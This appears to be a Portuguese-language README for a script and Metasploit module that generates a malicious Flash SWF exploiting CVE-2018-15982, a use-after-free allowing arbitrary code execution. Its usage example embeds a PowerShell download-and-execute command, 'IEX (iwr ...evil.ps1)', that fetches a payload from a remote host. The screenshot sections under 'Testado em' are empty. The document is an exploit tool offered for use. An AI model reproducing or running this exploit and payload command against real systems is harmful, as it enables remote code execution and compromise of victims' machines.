
Script and metasploit module for CVE-2018-15982
Este script cria um payload swf para o CVE-2018-15982, que é baseado no PoC do https://github.com/smgorelik/Windows-RCE-exploits. A vulnerabilidade foi descoberta por Chenming Xu e Ed Miles da Gigamon ATR.
A vulnerabilidade é uma falha de use-after-free que permite a execução arbitrária de código no Flash. Mais informações podem ser encontradas nos links abaixo.
Nota: Atualmente está sendo pulverizado apenas um bloco, percebi isso depois de criar o script.
Uso:
python create_swf.py <command> <output file name>
Exemplo de uso:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
Testado em:
Criar payload:

Executando payload:

Confirmar execução:

